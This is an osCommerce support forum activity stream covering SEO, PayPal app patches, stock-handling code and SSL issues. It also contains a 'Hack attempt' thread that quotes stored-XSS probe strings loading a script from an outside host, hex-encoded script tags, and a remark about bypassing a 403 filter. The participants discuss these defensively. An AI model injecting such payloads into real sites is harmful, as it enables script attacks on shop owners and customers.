Jump to content

All Activity

This stream auto-updates     

  1. Past hour
  2. Hotclutch

    Domain change, SEO and new oscommerce site version

    The new domain will be considered a new site. If you own both domains then you can implement a 301 redirect of the old domain to the new, that will preserve most of the value built up by the old domain and transfer it onto the new domain. fixed.
  3. Hi all, hope all good there!! I have a question, I want to change the domain of a site from www.sitio1.com to www.sitio2.com, what impact does that have on SEO? What recommendations can you give me? What impacts at SEO level can it have? Any recommendation? I also want to start trying a new version of oscommerce, My question is whether to do it with Frozen (and fix all the bugs that it have), go to EDGE BS4 or wait for H to publish a new official version (hopefully fast!) What would you do? what it scares me is to move to BS4 are the addons (the current addons none is compatible with BS4, and I do not know how to transorb them from BS3 to BS4 haha ). Besides changing the front page maybe it would be good to use the Bootstrap V4 Oscommerce Administration v2.3.4.1 CE? Thank you very much, Valqui
  4. Today
  5. MrPhil

    PayPal App v5.018 Log In with PayPal is now dead

    It appears that there are incremental updates past 5.010. Do I have it right that I manually bring Frozen up to 5.010 with the PayPal app, and then apply the incremental updates 5.011, 14, 16, and 18 to be fully 5.018 ready? And then keep an eye open for further 5.xxx updates to come? I guess that HPDL is somehow keeping up to date with PayPal patches.
  6. MrPhil

    PayPal App v5.018 Log In with PayPal is now dead

    I'll look at the PayPal app update some more. I just want to be very careful not to break things! My end goal is still to have Frozen 5.018 out of the box. It's just that Gary's version baked into Frozen is 1) apparently 4.039, and 2) has been updated for various CE-related global changes. It looks like Harald's PayPal app was updated to 5.010, but lacks compatibility with Gary's CE changes. I'm hoping that maybe Gary will adopt the Frozen patch for PayPal 5.018 into Edge. Well, originally PHP had $HTTP_POST_VARS and $HTTP_GET_VARS arrays. These were removed (or at least, deprecated) a long time ago, replaced by $_POST, $_GET, and $_REQUEST. osC kept copies of them (the long names), mostly to avoid the work of changing them, until Gary decided to bite the bullet and change them in his CE work. I think the scoping rules are a little different between the old and new array versions. I seem to recall that the argument was it was better to get in line with the new way of doing things, and fix old add-ons, than to continue to muddle along with the old way of doing things and confusing people.
  7. peterbuzzin

    PayPal App timing out?

    Hey @Smoky Barnable, Think I can help you with this too. The Express button and the Login button are two different beasts. As always please backup before making any changes and test all changes after. Express Button The Express button specifics vary depending on how you have it configured, whether it's dynamic or static. If it's static then it is an image that's loaded from paypalobjects.com but is done in the old fashioned way of <img src="https://www.paypalobjects.com/...."> so not much can be done about that other than to save the image and then upload it to your server so it's served locally which will speed up display. You'll need to change the definition for this URL found in includes/apps/paypal/languages/english/modules/EC/EC.php on line 22 approx. All of these changes are based on 5.018 of the stock osC PayPal App (not Frozen etc) From: module_ec_button_url = https://www.paypalobjects.com/webstatic/en_US/i/buttons/checkout-logo-medium.png To (as an example): module_ec_button_url = https://www.mydomainname.com/images/buttons/checkout-logo-medium.png However any auto-updates applied in the future will revert it back to stock. IF it's being loaded dynamically then it could be because it's trying to render before the page has fully loaded all resources and this is the same problem I've found with the Login button also suffers from. For the next part to work, jQuery must be called on the page before the output of this script in paypal_express.php In includes/modules/payment/paypal_express.php approx line 220 find: $string .= <<<EOD <span id="ppECButton"></span> <script> paypal.Button.render({ env: '{$server}', style: { size: '${button_size}', color: '${button_color}', shape: '${button_shape}' }, payment: function(resolve, reject) { paypal.request.post('${ppecset_url}') .then(function(data) { if ((data.token !== undefined) && (data.token.length > 0)) { resolve(data.token); } else { window.location = '${ppecerror_url}'; } }) .catch(function(err) { reject(err); window.location = '${ppecerror_url}'; }); }, onAuthorize: function(data, actions) { return actions.redirect(); }, onCancel: function(data, actions) { return actions.redirect(); } }, '#ppECButton'); </script> EOD; And replace with: $string .= <<<EOD <span id="ppECButton"></span> <script> $( document ).ready(function() { paypal.Button.render({ env: '{$server}', style: { size: '${button_size}', color: '${button_color}', shape: '${button_shape}' }, payment: function(resolve, reject) { paypal.request.post('${ppecset_url}') .then(function(data) { if ((data.token !== undefined) && (data.token.length > 0)) { resolve(data.token); } else { window.location = '${ppecerror_url}'; } }) .catch(function(err) { reject(err); window.location = '${ppecerror_url}'; }); }, onAuthorize: function(data, actions) { return actions.redirect(); }, onCancel: function(data, actions) { return actions.redirect(); } }, '#ppECButton'); }); </script> EOD; PayPal Login THE CHANGES BELOW ARE ONLY FOR THOSE WHO HAVE SWAPPED OVER TO https://www.paypalobjects.com/js/external/connect/api.js LIKE SMOKY HAS (SEE OTHER POST REGARDING PAYPAL LOGIN UPDATE In includes/modules/content/login/templates/paypal_login.php find: <script type="text/javascript" src="https://www.paypalobjects.com/js/external/connect/api.js"></script> <script type="text/javascript"> paypal.use( ["login"], function(login) { login.render ({ <?php if ( OSCOM_APP_PAYPAL_LOGIN_STATUS == '0' ) { echo ' "authend": "sandbox",'; } if ( OSCOM_APP_PAYPAL_LOGIN_THEME == 'Neutral' ) { echo ' "theme": "neutral",'; } ?> "responseType" : "code id_Token", "locale": "<?php echo $cm_paypal_login->_app->getDef('module_login_language_locale'); ?>", "appid": "<?php echo (OSCOM_APP_PAYPAL_LOGIN_STATUS == '1') ? OSCOM_APP_PAYPAL_LOGIN_LIVE_CLIENT_ID : OSCOM_APP_PAYPAL_LOGIN_SANDBOX_CLIENT_ID; ?>", "scopes": "<?php echo implode(' ', $use_scopes); ?>", "buttonType" : "CWP", "buttonShape" : "rectangle", "buttonSize" : "md", "fullPage" : "false", "containerid": "PayPalLoginButton", "returnurl": "<?php echo str_replace('&amp;', '&', tep_href_link(FILENAME_LOGIN, 'action=paypal_login', 'SSL', false)); ?>" }); }); </script> And replace with: <script type="text/javascript" src="https://www.paypalobjects.com/js/external/connect/api.js"></script> <script type="text/javascript"> $( document ).ready(function() { paypal.use( ["login"], function(login) { login.render ({ <?php if ( OSCOM_APP_PAYPAL_LOGIN_STATUS == '0' ) { echo ' "authend": "sandbox",'; } if ( OSCOM_APP_PAYPAL_LOGIN_THEME == 'Neutral' ) { echo ' "theme": "neutral",'; } ?> "responseType" : "code id_Token", "locale": "<?php echo $cm_paypal_login->_app->getDef('module_login_language_locale'); ?>", "appid": "<?php echo (OSCOM_APP_PAYPAL_LOGIN_STATUS == '1') ? OSCOM_APP_PAYPAL_LOGIN_LIVE_CLIENT_ID : OSCOM_APP_PAYPAL_LOGIN_SANDBOX_CLIENT_ID; ?>", "scopes": "<?php echo implode(' ', $use_scopes); ?>", "buttonType" : "CWP", "buttonShape" : "rectangle", "buttonSize" : "md", "fullPage" : "false", "containerid": "PayPalLoginButton", "returnurl": "<?php echo str_replace('&amp;', '&', tep_href_link(FILENAME_LOGIN, 'action=paypal_login', 'SSL', false)); ?>" }); }); }); </script> Again, any changes made to the above files will be overwritten if the PayPal auto-update button is used at anypoint in the future.
  8. peterbuzzin

    PayPal Express ~ Duplicate Orders

    @pete2007 it sure is (but don't tell burt I told you this or he'll get all "Stack Overflow" on me!!). Again, anyone else reading this, this is method is specific for pete2007's installation which doesn't make use of Header Tags modules nor $oscTemplate->getBlocks('footer_scripts'); and everything is hardcoded in template_bottom.php In ext/jquery/main.js find: /* BOF Prevent multiple form submissions from multiple clicks on checkout_confirmation.php */ if($('form[name=checkout_confirmation]').length > 0){ $('form[name=checkout_confirmation]').submit(function(){ Replace with: /* BOF Prevent multiple form submissions from multiple clicks on checkout_confirmation.php and contact_us.php */ if($('form[name=checkout_confirmation], form[name=contact_us]').length > 0){ $('form[name=checkout_confirmation], form[name=contact_us]').submit(function(){ And then just for the sake of completeness find: /* EOF Prevent multiple form submissions from multiple clicks */ And replace with: /* EOF Prevent multiple form submissions from multiple clicks on checkout_confirmation.php and contact_us.php */ The only caveat is that it will only display one message i.e. "Loading please wait", might have been nicer to have "Sending please wait" for the contact form. But if you want you could change it to just "Please wait" which would apply equally to both forms nicely.
  9. JcMagpie

    Hack attempt - is there a way to prevent this?

    Not sure now as was able to bypass 403 with simple mod to ascii and hex. layout gets messed up both in shop and admin and ends up in db. search accepted input. I would say not a big issue but for the fact that I see fake accounts every day. Jack's honey pot has them down to 5 or 6 per attack per day but they still get in. Here is a typical example, filtering them out is nearly imposiable as they use real email address which clearly don't belong to them. as did make account admin takes input and output the rubbish. as will the db,
  10. peterbuzzin

    PayPal App v5.018 Log In with PayPal is now dead

    @MrPhil The paypal app code is hosted on oscommerce.com and most likely maintained by HPDL. From the following URL https://apps.oscommerce.com/index.php?Download&paypal&app&2_300&5_018&update for example will download the latest version in a zip file. So unless HPDL updates the codebase to refect changes it will overwrite when pressing the auto-update button. But it's easy enough to change the auto-update URL so it points to a different repository that contains non-breaking/compatible archives which will then effectively cut off HPDL updates but as long as you mirror any updates with code amended for Frozen. (I'm considering doing the same as I've customised the PP modules heavily and if one of my clients hit the update button it would be lost so I've hidden it for now) What were the reasons for removing them, why is it a bad thing? Seems like a lot of effort to remove something and replace it with something which is basically the same thing. There's nothing bad about replacing them other than you'll lose the auto-escaping feature, and any existing modules that would have been compatible would need to be updated (swapping out $HTTP_POST_VARS for $_POST for example) for the sake of continuity. Time could be better spent elsewhere IMO.
  11. In bm_category.php use: $category_titel = $OSCOM_CategoryTree->getData($current_category_id, 'name'); You just have to add a check if $current_category_id is not empty or zero and use MODULE_BOXES_CATEGORIES_BOX_TITLE for that case.
  12. raiwa

    Hack attempt - is there a way to prevent this?

    I guess this input example has been cleaned with: tep_db_prepare_input: function tep_db_prepare_input($string) { if (is_string($string)) { return trim(tep_sanitize_string(stripslashes($string))); } elseif (is_array($string)) { foreach($string as $key => $value) { $string[$key] = tep_db_prepare_input($value); } return $string; } else { return $string; } } which uses tep_sanitize_string: function tep_sanitize_string($string) { $patterns = array ('/ +/','/[<>]/'); $replace = array (' ', '_'); return preg_replace($patterns, $replace, trim($string)); } If it is enough I do not know neither.
  13. Hi everyone, sorry I just saw this today.. At my checkout_process.php it's like this: <?php //.... for ($i=0, $n=sizeof($order->products); $i<$n; $i++) { //++++ QT Pro: Begin Changed code $products_stock_attributes=null; if (STOCK_LIMITED == 'true') { $products_attributes = $order->products[$i]['attributes']; // if (DOWNLOAD_ENABLED == 'true') { //++++ QT Pro: End Changed Code $stock_query_raw = "SELECT products_quantity, pad.products_attributes_filename FROM " . TABLE_PRODUCTS . " p LEFT JOIN " . TABLE_PRODUCTS_ATTRIBUTES . " pa ON p.products_id=pa.products_id LEFT JOIN " . TABLE_PRODUCTS_ATTRIBUTES_DOWNLOAD . " pad ON pa.products_attributes_id=pad.products_attributes_id WHERE p.products_id = '" . tep_get_prid($order->products[$i]['id']) . "'"; // Will work with only one option for downloadable products // otherwise, we have to build the query dynamically with a loop $products_attributes = (isset($order->products[$i]['attributes'])) ? $order->products[$i]['attributes'] : ''; if (is_array($products_attributes)) { $stock_query_raw .= " AND pa.options_id = '" . (int)$products_attributes[0]['option_id'] . "' AND pa.options_values_id = '" . (int)$products_attributes[0]['value_id'] . "'"; } $stock_query = tep_db_query($stock_query_raw); } else { $stock_query = tep_db_query("select products_quantity from " . TABLE_PRODUCTS . " where products_id = '" . tep_get_prid($order->products[$i]['id']) . "'"); } if (tep_db_num_rows($stock_query) > 0) { $stock_values = tep_db_fetch_array($stock_query); // do not decrement quantities if products_attributes_filename exists $actual_stock_bought = $order->products[$i]['qty']; $download_selected = false; if ((DOWNLOAD_ENABLED == 'true') && isset($stock_values['products_attributes_filename']) && tep_not_null($stock_values['products_attributes_filename'])) { $download_selected = true; $products_stock_attributes='$$DOWNLOAD$$'; } // If not downloadable and attributes present, adjust attribute stock if (!$download_selected && is_array($products_attributes)) { $all_nonstocked = true; $products_stock_attributes_array = array(); foreach ($products_attributes as $attribute) { if ($attribute['track_stock'] == 1) { $products_stock_attributes_array[] = $attribute['option_id'] . "-" . $attribute['value_id']; $all_nonstocked = false; } } if ($all_nonstocked) { $actual_stock_bought = $order->products[$i]['qty']; } else { asort($products_stock_attributes_array, SORT_NUMERIC); $products_stock_attributes = implode(",", $products_stock_attributes_array); $attributes_stock_query = tep_db_query("select products_stock_quantity from " . TABLE_PRODUCTS_STOCK . " where products_stock_attributes = '$products_stock_attributes' AND products_id = '" . tep_get_prid($order->products[$i]['id']) . "'"); if (tep_db_num_rows($attributes_stock_query) > 0) { $attributes_stock_values = tep_db_fetch_array($attributes_stock_query); $attributes_stock_left = $attributes_stock_values['products_stock_quantity'] - $order->products[$i]['qty']; tep_db_query("update " . TABLE_PRODUCTS_STOCK . " set products_stock_quantity = '" . $attributes_stock_left . "' where products_stock_attributes = '$products_stock_attributes' AND products_id = '" . tep_get_prid($order->products[$i]['id']) . "'"); $actual_stock_bought = ($attributes_stock_left < 1) ? $attributes_stock_values['products_stock_quantity'] : $order->products[$i]['qty']; } else { $attributes_stock_left = 0 - $order->products[$i]['qty']; tep_db_query("insert into " . TABLE_PRODUCTS_STOCK . " (products_id, products_stock_attributes, products_stock_quantity) values ('" . tep_get_prid($order->products[$i]['id']) . "', '" . $products_stock_attributes . "', '" . $attributes_stock_left . "')"); $actual_stock_bought = 0; } } } // $stock_query = tep_db_query("select products_quantity from " . TABLE_PRODUCTS . " where products_id = '" . tep_get_prid($order->products[$i]['id']) . "'"); // } // if (tep_db_num_rows($stock_query) > 0) { // $stock_values = tep_db_fetch_array($stock_query); // do not decrement quantities if products_attributes_filename exists if (!$download_selected) { $stock_left = $stock_values['products_quantity'] - $actual_stock_bought; tep_db_query("UPDATE " . TABLE_PRODUCTS . " SET products_quantity = products_quantity - '" . $actual_stock_bought . "' WHERE products_id = '" . tep_get_prid($order->products[$i]['id']) . "'"); //++++ QT Pro: End Changed Code } } //.... ?>
  14. Thank you, that was a really simple way to do it. So what I'm trying to bring in now: left navigation now shows only the current level we're at - selected using the method you've shown me global $oscTemplate´╗┐, $cPath, $current_category_id; But in the header for the left menu, I wish it to say Category: "current category name". So I need to pull in the current category name there. So it can't be just getTree, it needs to be the selected category name. I'll be looking for the variable to put, but if you are able to help or push me in the right direction that will be great.
  15. JcMagpie

    Hack attempt - is there a way to prevent this?

    Both blocked by server with 403 error page.
  16. puddlec

    Hack attempt - is there a way to prevent this?

    how would it handle stuff like &lt;script src=&quot;google.com&quot;&gt; and &#x3c;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x20;&#x73;&#x72;&#x63;&#x3d;&#x22;&#x67;&#x6f;&#x6f;&#x67;&#x6c;&#x65;&#x2e;&#x63;&#x6f;&#x6d;&#x22;&#x3e;
  17. greasemonkey

    Hack attempt - is there a way to prevent this?

    @raiwa is this cleaned by tep_draw_input_field (which is sanitizing with stripslashes)? And if so... is it enough? This is definitely out of my skill range - it really is just a question. Reading about SQL injections (again I'm not sure I understand it clearly) should we not be using PDO (as in 2.4) or at minimum htmlspecialchars? Source: https://stackoverflow.com/questions/29678806/secure-all-inputs-in-php-form
  18. MrPhil

    Security checks gone

    Don't forget to patch Frozen (see my signature). I don't think there is a Dutch language pack specifically for this version, but you might find one that is close (a little update and translation work needed by you). At worst, you'll have to compare the Frozen language files side-by-side with whatever Dutch version you have, and copy over line-by-line, and translate the rest. If you do this successfully, and there is no existing Dutch pack, please consider offering it as a language add-on. Be careful that your editor doesn't add a Byte Order Mark to edited files! As far as layout changes go, some of this might be possible in user.css, but some might require PHP code changes. It all depends on what you want to do. Good luck, and let us know how it turns out!
  19. You have to do it yourself (it's not a one-button install in Softaculous, etc.), but if you pay your host enough money, they could probably be persuaded to do it for you. It's a manual install of the code (and a new database), and copy over and update your data (including the database). I would suggest setting up a private password-protected directory on your site and installing there, to try it out. You can play with the default sample data to see if you want to go further, then practice on a copy of your store's database (which will need to be updated). See if you need to install any add-ons, do any custom code changes, or just tweak the CSS in user.css file. You're going to have to do this eventually, when your host upgrades to PHP 7, so you might as well dip your toes in the water now and get the feel of things on a safe play system, before it becomes an emergency situation. From your questions, it sounds like you know very little about running a website (the mechanics behind it), so you might want to bring someone on board to help you with all this.
  20. raiwa

    Hack attempt - is there a way to prevent this?

    malicious/problematic code has already been filtered out in this example: Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC 244 Whatever St"__sCRiPt sRC=//jb.gy/i__/sCrIpT_
  21. GoCastaway58

    Security checks gone

    I already installed a clean "Frozen" on my server and it works perfect as far as i can see. The layout is good responsive, but when i am going to use it i am gonna make some changes in the layout etc, and i also need it in Dutch, so i have to look if the language pack that i have is up to date. Next weeks i am going to work on it, will keep you updated.
  22. 4girlsandaguy

    Admin page not logging secure, not displaying correct

    That did it. Looks the way it should.......Thank you!!!!
  23. JcMagpie

    Admin page not logging secure, not displaying correct

    This will be down to you beeing on a shared server, looks like your host as turned on SSL on the server, just check you config file in admin/includes and make sure all http statments are changes to https. You will need to check this for every link in your code as any that still call http will cause problems of mixed content.
  24. 4girlsandaguy

    Admin page not logging secure, not displaying correct

    Mr. Phil, how do I upgrade this? Is this something I have to have my hosting company do or can I do this myself?
  25. 4girlsandaguy

    Admin page not logging secure, not displaying correct

    I checked the browser code. It looks just what you have. But what is happening is that the .css and .js files are all blocked because it is a insecure site. My shopping cart is secure but for some reason my admin page is not. I will have my hosting site address this and follow up here. Thanks for the insite and info.
  26. A few general notes: did your host just upgrade PHP (to 5.6)? osC 2.3.4 (official release) is a bit long of tooth, and has been known to have problems with PHP versions above 5.4 or so, although I don't recall seeing problems this severe. Did you get moved to a different server? Did your host make any other changes, such as forcing SSL? It's not uncommon for one hand (server support) to make major changes and not tell the other hand (customer support) what they did. Could you have been hacked (any files show inexplicably recent updates)? Did you make some "innocent little change"? By the way, PHP 5.6 is no longer supported (ditto 7.0) and 7.1 won't be soon, so try to upgrade your store before you run into severe problems on the next PHP upgrade. The only current osCommerce is "Frozen" (or "Edge", if you're adventurous) -- see link for it (plus patches) below in my signature. The official osC releases are years behind.
  27. JcMagpie

    Hack attempt - is there a way to prevent this?

    So going back to the original post of what if some one uses a form to inject script into the db? Look's like no cleaning is done before input is saved to db in official osC or CE. Script used in create account form is simply passed over to each page and saved into db. No scrubing is done when it is pulled out to display, And db is just taking the data presented to it. The test script used was the one origionaly posted and used as a test ( can do no harm as it not active on it's own) Bob Smith"__sCRiPt sRC=//jb.gy/i__/sC So looks like some method of scrubing all forms and input boxes is needed not just the search. Or have I missed somthing?
  1. Load more activity
×